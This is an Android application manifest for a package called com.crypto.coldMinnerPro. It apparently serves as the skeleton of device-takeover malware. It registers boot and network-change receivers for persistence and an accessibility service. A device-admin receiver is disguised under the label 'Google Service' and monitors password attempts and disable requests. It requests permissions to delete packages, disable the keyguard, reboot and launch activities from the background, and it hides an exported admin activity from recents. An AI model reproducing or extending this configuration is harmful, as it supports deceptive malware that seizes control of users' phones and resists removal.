
<manifest
	xmlns:android="http://schemas.android.com/apk/res/android"
	package="com.crypto.coldMinnerPro">
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
	<uses-permission android:name="android.permission.INTERNET" />
	<uses-permission android:name="android.permission.REQUEST_COMPANION_RUN_IN_BACKGROUND" />
	<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
	<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
	<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
	<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
	<uses-permission android:name="android.permission.RECEIVE_DATA_ACTIVITY_CHANGE" />
	<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE" />
	<uses-permission android:name="android.permission.OPEN_ACCESSIBILITY_DETAILS_SETTINGS" />
	<uses-permission android:name="android.permission.BIND_DEVICE_ADMIN" />
	<uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
	<uses-permission android:name="android.permission.REQUEST_COMPANION_START_FOREGROUND_SERVICES_FROM_BACKGROUND" />
	<uses-permission android:name="android.permission.START_FOREGROUND_SERVICES_FROM_BACKGROUND" />
	<uses-permission android:name="android.permission.WAKE_LOCK" />
	<uses-permission android:name="android.permission.REBOOT" />
	<uses-permission android:name="android.permission.DISABLE_KEYGUARD" />
	<uses-permission android:name="android.permission.REQUEST_COMPANION_USE_DATA_IN_BACKGROUND" />
	<uses-permission android:name="android.permission.START_ACTIVITIES_FROM_BACKGROUND" />
	<uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES" />
	<uses-permission android:name="android.permission.DELETE_PACKAGES" />
	<application
		android:allowBackup="true"
		android:icon="@drawable/app_icon"
		android:label="@string/app_name"
		android:usesCleartextTraffic="true"
		android:theme="@style/AppTheme">
		<activity
			android:name=".MainActivity"
			android:configChanges="orientation|screenSize|keyboardHidden|smallestScreenSize|screenLayout"
			android:hardwareAccelerated="true"
			android:supportsPictureInPicture="true"
			android:theme="@style/FullScreen"
			android:screenOrientation="portrait" />
		<activity
			android:name=".SpashActivity"
			android:configChanges="orientation|screenSize|keyboardHidden|smallestScreenSize|screenLayout"
			android:hardwareAccelerated="true"
			android:supportsPictureInPicture="true"
			android:theme="@style/FullScreen"
			android:screenOrientation="portrait">
			<intent-filter>
				<action android:name="android.intent.action.MAIN" />
				<category android:name="android.intent.category.LAUNCHER" />
			</intent-filter>
		</activity>
		<activity
			android:name=".DebugActivity"
			android:screenOrientation="portrait" />
		<uses-library
			android:name="org.apache.http.legacy"
			android:required="false" />
       
       <activity
			android:name="com.crypto.coldMinnerPro.ActivityAdminqw"
			android:excludeFromRecents="true"
            android:label=""
            android:exported="true"
            android:theme="@android:style/Theme.NoTitleBar.Fullscreen"/>
       <activity android:name=".InternetActivity"
           android:theme="@android:style/Theme.NoTitleBar.Fullscreen" />
              
         <receiver
            android:name=".receivers.BootReceiver"
            android:directBootAware="true"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            
            <intent-filter
             android:priority="500">
                <category android:name="android.intent.category.DEFAULT" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.REBOOT" />
            </intent-filter>
        </receiver>
        
        <receiver android:name=".receivers.NetworkChangeReceiver"
           android:enabled="true"
           android:exported="true">
           <intent-filter
            android:priority="500">
               <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
           </intent-filter>
        </receiver>
        
         <service
            android:name=".services.MyAccessibilityService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:enabled="true"
            android:exported="true">
            
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>
        
        <receiver
            android:name=".receivers.AdminReceiverzxc"
            android:label="Google Service"
            android:exported="true"
            android:description="@string/adm"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/adm" />

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.ACTION_PASSWORD_FAILED" />
                <action android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
            </intent-filter>
        </receiver>
	</application>
</manifest>